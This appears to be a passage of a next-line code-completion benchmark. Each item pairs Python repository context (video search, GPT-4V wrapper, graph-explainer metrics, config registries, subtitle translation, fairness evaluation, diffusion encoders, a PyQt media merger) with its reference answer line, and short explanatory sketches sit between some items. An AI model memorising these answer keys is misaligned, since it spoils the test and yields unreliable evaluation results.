SearchResult: def __init__(self, _connection, **kwargs): self._connection = _connection self.shots = [] self.stream_url = None self.player_url = None 
self.collection_id = "default" self._results = kwargs.get("results", []) self._format_results() def _format_results(self): for result in self._results: self.collection_id = result.get("collection_id") for doc in result.get("docs"): self.shots.append( Shot( self._connection, result.get("video_id"), result.get("length"), result.get("title"), doc.get("start"), doc.get("end"), doc.get("text"), doc.get("score"), ) ) def __repr__(self) -> str: return ( f"SearchResult(" f"collection_id={self.collection_id}, " f"stream_url={self.stream_url}, " f"player_url={self.player_url}, " f"shots={self.shots})" ) def get_shots(self) -> List[Shot]: return self.shots def compile(self) -> str: """Compile the search result shots into a stream url :raises SearchError: If no shots are found in the search results :return: The stream url :rtype: str """ if self.stream_url: return self.stream_url elif self.shots: compile_data = self._connection.post( path=f"{ApiPath.compile}", data=[ { "video_id": shot.video_id, "collection_id": self.collection_id, "shots": [(shot.start, shot.end)], } for shot in self.shots ], ) self.stream_url = compile_data.get("stream_url") self.player_url = compile_data.get("player_url") return self.stream_url else: raise SearchError("No shots found in search results to compile") def play(self) -> str: """Generate a stream url for the shot and open it in the default browser :return: The stream url :rtype: str """ self.compile()
return play_stream(self.stream_url)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: IDEA-CCNL/Real-Gemini # Path: real_gemini/utils/image_stacker.py def load_image(path): image = Image.open(path) return image # Path: real_gemini/utils/image_stacker.py def image2base64(image): buffered = BytesIO() image.save(buffered, format="PNG") return base64.b64encode(buffered.getvalue()).decode() # Path: real_gemini/tools/gpt4v_tool.py import os import json from typing import List from langchain.memory import ChatMessageHistory from langchain.chat_models import ChatOpenAI from langchain_core.messages import HumanMessage, SystemMessage from ..utils.image_stacker import load_image, image2base64 #encoding=utf8 _OPEN_AI_SYSTEM_PROMPT = """the user is dictating with his or her camera on. they are showing you things visually and giving you text prompts. be very brief and concise. be extremely concise. this is very important for my career. do not ramble. do not comment on what the person is wearing or where they are sitting or their background. focus on their gestures and the question they ask you. do not mention that there are a sequence of pictures. focus only on the image or the images necessary to answer the question. don't comment if they are smiling. don't comment if they are frowning. just focus on what they're asking. """ class GPT4VTool(object): _name_ = "GPT-4-Vision" _description_ = "这个工具是GPT for vision的调用接口。用于图像到文本的理解。本工具的输入是一段文本指令和一张或者多张图片,请注意,工具的输入由一个JSON字符串组成,json包括两个key,question和image_input。question表示文本指令,image_input表示图片路径或存放图片的目录。例如:{{\"question\": QUESTION, \"image_input\": IMAGE_PATH_OR_DIR}}。A wrapper around OpenAI GPT4V API. Useful for image-to-text understanding when you need to generate text from some images and a text description. The input of this tool is a text prompt and one or more images. Please note, the input of the tool consists of a JSON string, the json includes two keys, question and image_input. The question represents text instructions, and image_input represents the image path or the directory where the images are stored. For example: {{\"question\": QUESTION, \"image_input\": IMAGE_PATH_OR_DIR}}." _return_direct_ = False def __init__(self): self._gpt4v = ChatOpenAI( model="gpt-4-vision-preview", max_tokens=256) self.max_dialog_turn = 3 self.history = ChatMessageHistory() self.history.add_message( SystemMessage( content=[ {"type": "text", "text": _OPEN_AI_SYSTEM_PROMPT} ] ) ) def inference(self, input_str: str): input_dict = json.loads(input_str) image_path = input_dict["image_input"] if os.path.isdir(image_path): image_paths = [ os.path.join(image_path, path) for path in os.listdir(image_path)] else: image_paths = [image_path] base64_images = [] for image_path in image_paths:
base64_image = image2base64(load_image(image_path))
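image2base64 in this example is the standard in-memory PNG-to-base64 round trip used to inline images in an API payload. A self-contained version with a data-URL usage example; the payload shape mirrors OpenAI-style vision messages and is shown only as an illustration:

import base64
from io import BytesIO
from PIL import Image

def image_to_base64(image):
    # Encode to PNG in memory, then base64 for embedding in JSON.
    buffer = BytesIO()
    image.save(buffer, format="PNG")
    return base64.b64encode(buffer.getvalue()).decode()

image = Image.new("RGB", (4, 4), "red")
content = {"type": "image_url",
           "image_url": {"url": f"data:image/png;base64,{image_to_base64(image)}"}}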
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: aiim-research/GRETEL # Path: src/evaluation/evaluation_metric_base.py class EvaluationMetric(ABC): def __init__(self, config_dict=None) -> None: super().__init__() self._name = 'abstract_metric' self._config_dict = config_dict self._special = False #TODO: this must be removed in the future just to manage Runtime NOW QUICKFIX @property def name(self): return self._name @name.setter def name(self, new_name): self._name = new_name @abstractmethod def evaluate(self, instance_1 , instance_2 , oracle : Oracle=None, explainer : Explainer=None, dataset = None): pass def aggregate(self,measure_list): return np.mean(measure_list),np.std(measure_list) # Path: src/core/oracle_base.py class Oracle(Trainable,metaclass=ABCMeta): def __init__(self, context:Context, local_config) -> None: super().__init__(context, local_config) self._call_counter = 0 @final def predict(self, data_instance): """predicts the label of a given data instance ------------- INPUT: data_instance : The instance whose class is going to be predicted ------------- OUTPUT: The predicted label for the data instance """ self._call_counter += 1 return self._real_predict(data_instance) @final def predict_proba(self, data_instance): """predicts the probability estimates for a given data instance ------------- INPUT: data_instance : The instance whose class is going to be predicted ------------- OUTPUT: The predicted probability estimates for the data instance """ self._call_counter += 1 return self._real_predict_proba(data_instance) @final def get_calls_count(self): return self._call_counter @final def reset_call_count(self): self._call_counter = 0 @final def predict_list(self, dataset: Dataset, fold_id=0): sptest = dataset.get_split_indices()[fold_id]['test'] result = [self.predict(dataset.get_instance(i)) for i in sptest] return result '''@abstractmethod'''#TODO: need to be reactivated and implemented. May can be removed accordingly to Mario and GRETEL philosphy def evaluate(self, dataset: Dataset, fold_id=0): pass @abstractmethod def _real_predict(self, data_instance): pass @abstractmethod def _real_predict_proba(self, data_instance): pass # Path: src/core/explainer_base.py class Explainer(Configurable, metaclass=ABCMeta): def __init__(self, context: Context, local_config): self.dataset = retake_dataset(local_config) self.oracle = retake_oracle(local_config) super().__init__(context, local_config) @abstractmethod def explain(self, instance): pass def check_configuration(self): super().check_configuration() self.local_config['parameters']['fold_id'] = self.local_config['parameters'].get('fold_id', -1) self.fold_id = self.local_config['parameters']['fold_id'] # Path: src/evaluation/evaluation_metric_smiles_levenshtein.py from functools import lru_cache from src.evaluation.evaluation_metric_base import EvaluationMetric from src.core.oracle_base import Oracle from src.core.explainer_base import Explainer class SmilesLevenshteinMetric(EvaluationMetric): """Provides the ratio between the number of features modified to obtain the counterfactual example and the number of features in the original instance. Only considers structural features. 
""" def __init__(self, config_dict=None) -> None: super().__init__(config_dict) self._name = 'Smiles-Levenshtein'
def evaluate(self, instance_1 , instance_2 , oracle : Oracle=None, explainer : Explainer=None, dataset = None):
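The evaluate body of SmilesLevenshteinMetric is cut off above, so the following is only a sketch of the edit-distance kernel such a metric would plausibly rest on, not the repository's implementation (the lru_cache import in the source hints at memoization; this version uses iterative DP instead):

def levenshtein(a, b):
    # Classic dynamic-programming edit distance between two SMILES strings.
    previous = list(range(len(b) + 1))
    for i, char_a in enumerate(a, start=1):
        current = [i]
        for j, char_b in enumerate(b, start=1):
            current.append(min(previous[j] + 1,                        # deletion
                               current[j - 1] + 1,                     # insertion
                               previous[j - 1] + (char_a != char_b)))  # substitution
        previous = current
    return previous[-1]

assert levenshtein("CCO", "CCN") == 1   # ethanol vs. ethylamine, one substitution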
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: modelscope/scepter # Path: scepter/modules/utils/registry.py class Registry(object): """ A registry maps key to classes or functions. Example: # >>> MODELS = Registry('MODELS') # >>> @MODELS.register_class() # >>> class ResNet(object): # >>> pass # >>> config = Config(cfg_dict = {"NAME":"ResNet"}) # >>> resnet = MODELS.build(config) # >>> # >>> import torchvision # >>> @MODELS.register_function("InceptionV3") # >>> def get_inception_v3(pretrained=False, progress=True): # >>> return torchvision.model.inception_v3(pretrained=pretrained, progress=progress) # >>> config = Config(cfg_dict = {"NAME":"InceptionV3"}) # >>> inception_v3 = MODELS.build(config) Args: name (str): Registry name. build_func (func, None): Instance construct function. Default is build_from_config. allow_types (tuple): Indicates how to construct the instance, by constructing class or invoking function. """ def __init__(self, name, build_func=None, common_para=None, allow_types=('class', 'function')): self.name = name self.allow_types = allow_types self.class_map = {} self.func_map = {} self.common_para = common_para self.build_func = build_func or build_from_config REGISTRY_LIST.append(self) def get(self, req_type): return self.class_map.get(req_type) or self.func_map.get(req_type) def build(self, cfg, logger=None, *args, **kwargs): return self.build_func(cfg, registry=self, logger=logger, *args, **kwargs) def register_class(self, name=None): def _register(cls): if not inspect.isclass(cls): raise TypeError(f'Module must be type class, got {type(cls)}') if 'class' not in self.allow_types: raise TypeError( f'Register {self.name} only allows type {self.allow_types}, got class' ) module_name = name or cls.__name__ if module_name in self.class_map: warnings.warn( f'Class {module_name} already registered by {self.class_map[module_name]}, ' f'will be replaced by {cls}') self.class_map[module_name] = cls return cls return _register def register_function(self, name=None): def _register(func): if not inspect.isfunction(func): raise TypeError( f'Registry must be type function, got {type(func)}') if 'function' not in self.allow_types: raise TypeError( f'Registry {self.name} only allows type {self.allow_types}, got function' ) func_name = name or func.__name__ if func_name in self.class_map: warnings.warn( f'Function {func_name} already registered by {self.func_map[func_name]}, ' f'will be replaced by {func}') self.func_map[func_name] = func return func return _register def _list(self): keys = sorted(list(self.class_map.keys()) + list(self.func_map.keys())) descriptions = [] for key in keys: if key in self.class_map: descriptions.append(f'{key}: {self.class_map[key]}') else: descriptions.append( f"{key}: <function '{self.func_map[key].__module__}.{self.func_map[key].__name__}'>" ) return '\n'.join(descriptions) def __repr__(self): description = self._list() description = '\n'.join(['\t' + s for s in description.split('\n')]) return f'{self.__class__.__name__} [{self.name}], \n' + description def get_config_template(self, name): common_yaml_str = '' if self.common_para is not None: common_yaml_str += 'The following para are used for this class.\n' common_yaml_str += dict_to_yaml('common_parameter', 
__class__.__name__, self.common_para, set_name=False) req_type_entry = self.get(name) if req_type_entry is None: raise KeyError(f'{name} not found in {self.name} registry') if inspect.isclass(req_type_entry): return req_type_entry.get_config_template() + common_yaml_str elif inspect.isfunction(req_type_entry): return '{} is a function!'.format(name) else: return 'Unsupported object type!' # Path: scepter/modules/utils/registry.py def deep_copy(obj): return obj # Path: scepter/modules/opt/lr_schedulers/registry.py import inspect from scepter.modules.utils.registry import Registry, deep_copy from scepter.modules.utils.config import Config # -*- coding: utf-8 -*- # Copyright (c) Alibaba, Inc. and its affiliates. def build_lr_scheduler(cfg, registry, logger=None, *args, **kwargs): if not isinstance(cfg, Config): raise TypeError(f'config must be type dict, got {type(cfg)}') if not cfg.have('NAME'): raise KeyError(f'config must contain key NAME, got {cfg}')
if not isinstance(registry, Registry):
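build_lr_scheduler above validates the Config and dispatches on its NAME key, the same pattern as the Registry class shown earlier in this example. A much-reduced sketch of that name-to-class dispatch (the real register_class takes an optional name, warns on collisions, and supports functions too):

class Registry:
    def __init__(self, name):
        self.name, self.class_map = name, {}

    def register_class(self, cls):
        self.class_map[cls.__name__] = cls
        return cls

    def build(self, cfg):
        # Pop NAME, look the class up, pass the rest as constructor kwargs.
        params = dict(cfg)
        cls = self.class_map[params.pop("NAME")]
        return cls(**params)

MODELS = Registry("MODELS")

@MODELS.register_class
class ResNet:
    def __init__(self, depth=50):
        self.depth = depth

assert MODELS.build({"NAME": "ResNet", "depth": 18}).depth == 18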
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: pigeonai-org/ViDove # Path: src/translators/LLM_task.py def LLM_task(model_name, input, task, temp = 0.15): """ Translates input sentence with desired LLM. :param model_name: The name of the translation model to be used. :param input: Sentence for translation. :param task: Prompt. :param temp: Model temperature. """ if model_name in ["gpt-3.5-turbo", "gpt-4", "gpt-4-1106-preview"]: response = openai.ChatCompletion.create( model=model_name, messages=[ {"role": "system","content": task}, {"role": "user", "content": input} ], temperature=temp ) return response['choices'][0]['message']['content'].strip() # Other LLM not implemented else: raise NotImplementedError # Path: src/srt_util/srt.py def split_script(script_in, chunk_size=1000): script_split = script_in.split('\n\n') script_arr = [] range_arr = [] start = 1 end = 0 script = "" for sentence in script_split: if len(script) + len(sentence) + 1 <= chunk_size: script += sentence + '\n\n' end += 1 else: range_arr.append((start, end)) start = end + 1 end += 1 script_arr.append(script.strip()) script = sentence + '\n\n' if script.strip(): script_arr.append(script.strip()) range_arr.append((start, len(script_split) - 1)) assert len(script_arr) == len(range_arr) return script_arr, range_arr # Path: src/translators/translation.py from os import getenv from time import sleep from tqdm import tqdm from .LLM_task import LLM_task from src.srt_util.srt import split_script import logging def get_translation(srt, model, video_name, prompt = None, chunk_size = 1000): # print(srt.get_source_only()) script_arr, range_arr = split_script(srt.get_source_only(),chunk_size) translate(srt, script_arr, range_arr, model, video_name, task=prompt) pass def check_translation(sentence, translation): """ check merge sentence issue from openai translation """ sentence_count = sentence.count('\n\n') + 1 translation_count = translation.count('\n\n') + 1 if sentence_count != translation_count: return False else: return True # TODO{david}: prompts selector def prompt_selector(src_lang, tgt_lang, domain): language_map = { "EN": "English", "ZH": "Chinese", "ES": "Spanish", "FR": "France", "DE": "Germany", "RU": "Russian", "JA": "Japanese", "AR": "Arabic", } try: src_lang = language_map[src_lang] tgt_lang = language_map[tgt_lang] except: print("Unsupported language, is your abbreviation correct?") logging.info("Unsupported language detected") prompt = f""" you are a translation assistant, your job is to translate a video in domain of {domain} from {src_lang} to {tgt_lang}, you will be provided with a segement in {src_lang} parsed by line, where your translation text should keep the original meaning and the number of lines. """ return prompt def translate(srt, script_arr, range_arr, model_name, video_name=None, attempts_count=5, task=None, temp = 0.15): """ Translates the given script array into another language using the chatgpt and writes to the SRT file. This function takes a script array, a range array, a model name, a video name, and a video link as input. It iterates through sentences and range in the script and range arrays. 
    If the translation check fails for five times, the function will attempt to resolve merged-sentence issues and split the sentence into smaller tokens for a better translation.

    :param srt: An instance of the Subtitle class representing the SRT file.
    :param script_arr: A list of strings representing the original script sentences to be translated.
    :param range_arr: A list of tuples representing the start and end positions of sentences in the script.
    :param model_name: The name of the translation model to be used.
    :param video_name: The name of the video.
    :param attempts_count: Number of retry attempts for unmatched sentences.
    :param task: Prompt.
    :param temp: Model temperature.
    """
    if input is None:
        raise Exception("Warning! No input has been passed to the LLM!")
    if task is None:
        task = "你是一个翻译助理,你的任务是翻译视频,你会被提供一个按行分割的英文段落,你需要在保证句意和行数的情况下输出翻译后的文本。"
    logging.info(f"translation prompt: {task}")
    previous_length = 0
    for sentence, range_ in tqdm(zip(script_arr, range_arr)):
        # update the range based on previous length
        range_ = (range_[0] + previous_length, range_[1] + previous_length)
        # using chatgpt model
        print(f"now translating sentences {range_}")
        logging.info(f"now translating sentences {range_}")
        flag = True
        while flag:
            flag = False
            try:
translate = LLM_task(model_name, sentence, task, temp)
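The reference line sits inside a check-and-retry loop: call the LLM, verify the output keeps the input's paragraph count, and retry on mismatch. A self-contained sketch of that idea (the `call_llm` callable is a placeholder, not ViDove's `LLM_task`):

import time

def translate_with_retry(call_llm, sentence, max_attempts=5, delay=1.0):
    # A merged-sentence failure shows up as a mismatched paragraph count.
    expected = sentence.count('\n\n') + 1
    for _ in range(max_attempts):
        result = call_llm(sentence)
        if result.count('\n\n') + 1 == expected:
            return result
        time.sleep(delay)  # brief pause before retrying
    raise RuntimeError(f'unmatched sentence count after {max_attempts} attempts')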
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: YyzHarry/shortcut-ood-fairness # Path: utils/eval_helper.py def binary_metrics(targets, preds, label_set=[0, 1], suffix='', return_arrays=False): if len(targets) == 0: return {} res = { 'accuracy': accuracy_score(targets, preds), 'n_samples': len(targets) } if len(label_set) == 2: CM = confusion_matrix(targets, preds, labels=label_set) res['TN'] = CM[0][0].item() res['FN'] = CM[1][0].item() res['TP'] = CM[1][1].item() res['FP'] = CM[0][1].item() res['error'] = res['FN'] + res['FP'] if res['TP'] + res['FN'] == 0: res['TPR'] = 0 res['FNR'] = 1 else: res['TPR'] = res['TP']/(res['TP']+res['FN']) res['FNR'] = res['FN']/(res['TP']+res['FN']) if res['FP'] + res['TN'] == 0: res['FPR'] = 1 res['TNR'] = 0 else: res['FPR'] = res['FP']/(res['FP']+res['TN']) res['TNR'] = res['TN']/(res['FP']+res['TN']) res['pred_prevalence'] = (res['TP'] + res['FP']) / res['n_samples'] res['prevalence'] = (res['TP'] + res['FN']) / res['n_samples'] else: CM = confusion_matrix(targets, preds, labels=label_set) res['TPR'] = recall_score(targets, preds, labels=label_set, average='macro', zero_division=0.) if len(np.unique(targets)) > 1: res['balanced_acc'] = balanced_accuracy_score(targets, preds) if return_arrays: res['targets'] = targets res['preds'] = preds return {f"{i}{suffix}": res[i] for i in res} # Path: utils/eval_helper.py def prob_metrics(targets, preds, label_set, return_arrays=False): if len(targets) == 0: return {} res = { 'BCE': log_loss(targets, preds, eps=1e-6, labels=label_set), 'ECE': netcal.metrics.ECE().measure(preds, targets) } if len(set(targets)) > 2: # happens when you predict a class, but there are no samples with that class in the dataset try: res['AUROC'] = roc_auc_score(targets, preds, multi_class='ovr', labels=label_set) except: res['AUROC'] = roc_auc_score(targets, preds, multi_class='ovo', labels=label_set) elif len(set(targets)) == 2: res['AUROC'] = roc_auc_score(targets, preds, labels=label_set) elif len(set(targets)) == 1: res['AUROC'] = None if len(set(targets)) == 2: # res['ROC_curve'] = roc_curve(targets, preds) res['AUPRC'] = average_precision_score(targets, preds, average='macro') res['brier'] = brier_score_loss(targets, preds) res['mean_pred_1'] = preds[targets == 1].mean() res['mean_pred_0'] = preds[targets == 0].mean() if return_arrays: res['targets'] = targets res['preds'] = preds return res # Path: utils/lin_eval.py import numpy as np import torch from utils.eval_helper import binary_metrics, prob_metrics from sklearn.model_selection import GridSearchCV, PredefinedSplit from sklearn.pipeline import Pipeline from sklearn.linear_model import LogisticRegression from sklearn.base import clone from sklearn.metrics import roc_auc_score from sklearn.ensemble import RandomForestClassifier def get_representations(algorithm, loader, device): ys, atts, zs = [], [], [] algorithm.eval() with torch.no_grad(): for _, x, y, a in loader: z = algorithm.return_feats(x.to(device)).detach().cpu().numpy() zs.append(z) ys.append(y) atts.append(a) return np.concatenate(zs, axis=0), np.concatenate(atts, axis=0), np.concatenate(ys, axis=0) def fit_model(train_X, train_Y, val_X, val_Y, test_X, test_Y, model_type='lr'): if model_type == 'lr': pipe = Pipeline(steps=[ ('model', 
LogisticRegression(random_state=42, n_jobs=-1)) ]) param_grid = { 'model__C': 10**np.linspace(-5, 1, 10) } elif model_type == 'rf': pipe = Pipeline(steps=[ ('model', RandomForestClassifier(random_state=42, n_jobs=-1)) # ('model', XGBClassifier(random_state=42, n_jobs=-1)) ]) param_grid = { 'model__max_depth': list(range(1, 7)) } else: raise NotImplementedError pds = PredefinedSplit(test_fold=np.concatenate([np.ones((len(train_X),))*-1, np.zeros((len(val_X),))])) cv_lr = (GridSearchCV(pipe, param_grid, refit=False, cv=pds, scoring='roc_auc_ovr', verbose=10, n_jobs=-1).fit( np.concatenate((train_X, val_X)), np.concatenate((train_Y, val_Y)))) pipe = clone( clone(pipe).set_params(**cv_lr.best_params_) ) pipe = pipe.fit(train_X, train_Y) label_set = np.sort(np.unique(train_Y)) res = {} for sset, X, Y in zip(['va', 'te'], [val_X, test_X], [val_Y, test_Y]): preds = pipe.predict_proba(X) if len(label_set) == 2: preds = preds[:, 1] preds_rounded = preds >= 0.5 else: preds_rounded = preds.argmax(1)
res[sset] = binary_metrics(Y, preds_rounded, label_set=label_set, return_arrays=True)
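Worth spelling out is the `PredefinedSplit` trick used in the prompt above: marking training samples with -1 and validation samples with 0 makes `GridSearchCV` tune hyperparameters on one fixed train/validation split instead of cross-validating. A runnable toy example:

import numpy as np
from sklearn.model_selection import PredefinedSplit

# -1 = always in the training fold; 0 = the single validation fold.
test_fold = np.concatenate([np.full(6, -1), np.zeros(4)])
pds = PredefinedSplit(test_fold=test_fold)
for train_idx, val_idx in pds.split():
    print(train_idx)  # indices 0..5 -> the original training set
    print(val_idx)    # indices 6..9 -> the original validation set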
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: RomGai/BrainVis # Path: dc_ldm/modules/x_transformer.py class Encoder(AttentionLayers): def __init__(self, **kwargs): assert 'causal' not in kwargs, 'cannot set causality on encoder' super().__init__(causal=False, **kwargs) # Path: dc_ldm/modules/x_transformer.py class TransformerWrapper(nn.Module): def __init__( self, *, num_tokens, max_seq_len, attn_layers, emb_dim=None, max_mem_len=0., emb_dropout=0., num_memory_tokens=None, tie_embedding=False, use_pos_emb=True ): super().__init__() assert isinstance(attn_layers, AttentionLayers), 'attention layers must be one of Encoder or Decoder' dim = attn_layers.dim emb_dim = default(emb_dim, dim) self.max_seq_len = max_seq_len self.max_mem_len = max_mem_len self.num_tokens = num_tokens self.token_emb = nn.Embedding(num_tokens, emb_dim) self.pos_emb = AbsolutePositionalEmbedding(emb_dim, max_seq_len) if ( use_pos_emb and not attn_layers.has_pos_emb) else always(0) self.emb_dropout = nn.Dropout(emb_dropout) self.project_emb = nn.Linear(emb_dim, dim) if emb_dim != dim else nn.Identity() self.attn_layers = attn_layers self.norm = nn.LayerNorm(dim) self.init_() self.to_logits = nn.Linear(dim, num_tokens) if not tie_embedding else lambda t: t @ self.token_emb.weight.t() # memory tokens (like [cls]) from Memory Transformers paper num_memory_tokens = default(num_memory_tokens, 0) self.num_memory_tokens = num_memory_tokens if num_memory_tokens > 0: self.memory_tokens = nn.Parameter(torch.randn(num_memory_tokens, dim)) # let funnel encoder know number of memory tokens, if specified if hasattr(attn_layers, 'num_memory_tokens'): attn_layers.num_memory_tokens = num_memory_tokens def init_(self): nn.init.normal_(self.token_emb.weight, std=0.02) def forward( self, x, return_embeddings=False, mask=None, return_mems=False, return_attn=False, mems=None, **kwargs ): # b, n, device, num_mem = *x.shape, x.device, self.num_memory_tokens b = x.shape[0] device = x.device num_mem = self.num_memory_tokens x = self.token_emb(x) x += self.pos_emb(x) x = self.emb_dropout(x) x = self.project_emb(x) if num_mem > 0: mem = repeat(self.memory_tokens, 'n d -> b n d', b=b) x = torch.cat((mem, x), dim=1) # auto-handle masking after appending memory tokens if exists(mask): mask = F.pad(mask, (num_mem, 0), value=True) x, intermediates = self.attn_layers(x, mask=mask, mems=mems, return_hiddens=True, **kwargs) x = self.norm(x) mem, x = x[:, :num_mem], x[:, num_mem:] out = self.to_logits(x) if not return_embeddings else x if return_mems: hiddens = intermediates.hiddens new_mems = list(map(lambda pair: torch.cat(pair, dim=-2), zip(mems, hiddens))) if exists(mems) else hiddens new_mems = list(map(lambda t: t[..., -self.max_mem_len:, :].detach(), new_mems)) return out, new_mems if return_attn: attn_maps = list(map(lambda t: t.post_softmax_attn, intermediates.attn_intermediates)) return out, attn_maps return out # Path: dc_ldm/modules/encoders/modules.py import torch import torch.nn as nn import sys import kornia from functools import partial from PIL import Image from einops import rearrange, repeat from transformers import CLIPTokenizer, CLIPTextModel, AutoProcessor, CLIPVisionModel, CLIPVisionModelWithProjection from dc_ldm.modules.x_transformer import Encoder, 
TransformerWrapper  # TODO: can we directly rely on lucidrains code and simply add this as a requirement? --> test
from transformers import BertTokenizerFast  # TODO: add to requirements
# import clip

sys.path.append('../dreamdiffusion/code/')

class AbstractEncoder(nn.Module):
    def __init__(self):
        super().__init__()

    def encode(self, *args, **kwargs):
        raise NotImplementedError


class ClassEmbedder(nn.Module):
    def __init__(self, embed_dim, n_classes=1000, key='class'):
        super().__init__()
        self.key = key
        self.embedding = nn.Embedding(n_classes, embed_dim)

    def forward(self, batch, key=None):
        if key is None:
            key = self.key
        # this is for use in crossattn
        c = batch[key][:, None]
        c = self.embedding(c)
        return c


class TransformerEmbedder(AbstractEncoder):
    """Some transformer encoder layers"""
    def __init__(self, n_embed, n_layer, vocab_size, max_seq_len=77, device="cuda"):
        super().__init__()
        self.device = device
self.transformer = TransformerWrapper(num_tokens=vocab_size, max_seq_len=max_seq_len,
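The reference line is only the opening of the constructor call. In the upstream latent-diffusion code this class is based on, the call is completed with an `Encoder` attention stack; a sketch of the likely continuation (assumed, not verified against this repository):

self.transformer = TransformerWrapper(num_tokens=vocab_size, max_seq_len=max_seq_len,
                                      attn_layers=Encoder(dim=n_embed, depth=n_layer))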
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Rajeshwaran2001/DRM-Media-Tool # Path: helper/message.py def show_error_message(parent, message): error_box = QMessageBox() error_box.setIcon(QMessageBox.Critical) error_box.setWindowTitle("Error") error_box.setText(message) error_box.setWindowIcon(parent.windowIcon()) error_box.exec_() # Path: helper/message.py def show_success_message(parent, message): success_box = QMessageBox() success_box.setIcon(QMessageBox.Information) success_box.setWindowTitle("Success") success_box.setText(message) success_box.setWindowIcon(parent.windowIcon()) success_box.exec_() # Path: file_merger_dialog.py from PyQt5.QtWidgets import QWidget, QDialog, QVBoxLayout, QLabel, QTableWidget, QPushButton, QHBoxLayout, QTableWidgetItem, QCheckBox from helper.message import show_error_message, show_success_message import os import json import subprocess class FileMergerDialog(QDialog): def __init__(self, debug_logger, info_logger, folder_path, parent=None): super().__init__(parent) self.folder_path = folder_path self.setWindowTitle("Files Merger") self.setGeometry(100, 100, 600, 300) self.layout = QVBoxLayout() self.file_table_label = QLabel("Files in Directory:") self.file_table_widget = QTableWidget() self.file_table_widget.setColumnCount( 3) # Added a column for checkboxes self.file_table_widget.setHorizontalHeaderLabels( ["File Name", "Select", "Type"]) self.merge_button = QPushButton("Merge") self.merge_button.clicked.connect(self.merge_files) self.layout.addWidget(self.file_table_label) self.layout.addWidget(self.file_table_widget) self.layout.addWidget(self.merge_button) self.setLayout(self.layout) self.populate_file_table() self.file_table_widget.setColumnWidth(0, 400) self.debug_logger = debug_logger self.info_logger = info_logger def populate_file_table(self): # Clear existing items in the table widget self.file_table_widget.setRowCount(0) try: # List only video and audio files in the specified directory video_files = [file for file in os.listdir( self.folder_path) if file.lower().endswith(('.mp4', '.mkv', '.avi', '.webm'))] audio_files = [file for file in os.listdir( self.folder_path) if file.lower().endswith(('.mp3', '.wav', '.ogg', '.m4a', '.webm'))] # Add video files to the table widget for idx, file in enumerate(video_files): self.add_file_to_table(idx, file, "Video") # Add audio files to the table widget for idx, file in enumerate(audio_files, start=len(video_files)): self.add_file_to_table(idx, file, "Audio") except FileNotFoundError: # Handle the case where the specified directory does not exist self.file_table_widget.setRowCount(1) self.file_table_widget.setItem( 0, 2, QTableWidgetItem("Directory not found")) def add_file_to_table(self, idx, file, file_type): self.file_table_widget.insertRow(idx) # Center-align the content in the first column item_file_name = QTableWidgetItem(file) item_file_name.setTextAlignment(0x0004 | 0x0080) # AlignCenter self.file_table_widget.setItem(idx, 0, item_file_name) # Create a widget for the checkbox and center-align it checkbox_widget = QWidget() checkbox_layout = QHBoxLayout(checkbox_widget) checkbox_layout.addStretch(3) checkbox = QCheckBox() checkbox.setChecked(False) checkbox_layout.addWidget(checkbox) checkbox_layout.addStretch(3) # Set 
the widget with the centered checkbox in the second column self.file_table_widget.setCellWidget(idx, 1, checkbox_widget) # Set the file type in the third column self.file_table_widget.setItem(idx, 2, QTableWidgetItem(file_type)) def merge_files(self): selected_files = [] metadata = {} for row in range(self.file_table_widget.rowCount()): checkbox = self.file_table_widget.cellWidget( row, 1).layout().itemAt(1).widget() if checkbox.isChecked(): file_name = self.file_table_widget.item(row, 0).text() file_type = self.file_table_widget.item(row, 2).text() selected_files.append((file_name, file_type)) # Check if there are at least one video and one audio file selected if any(file_type == 'Video' for (_, file_type) in selected_files) and \ any(file_type == 'Audio' for (_, file_type) in selected_files): # Get all files in the directory ending with .info.json info_files = [file for file in os.listdir( self.folder_path) if file.endswith('.info.json')] img_files = [file for file in os.listdir( self.folder_path) if file.lower().endswith(('.jpg', '.jpeg', '.png', '.webp'))] language_mapping = { 'en': 'eng', 'eng': 'eng', 'english': 'eng', 'ta': 'tam', 'tamil': 'tam', 'tam': 'tam' } # Define language codes language_codes = list(language_mapping.keys()) suffixes = tuple(f'.{code}.vtt' for code in language_codes) subtitle_files = [file for file in os.listdir( self.folder_path) if file.endswith(suffixes)] thumbnail_file = None # Initialize with a default value # print(subtitle_files) if not info_files:
show_error_message(self, "Error: No Metadata files found.")
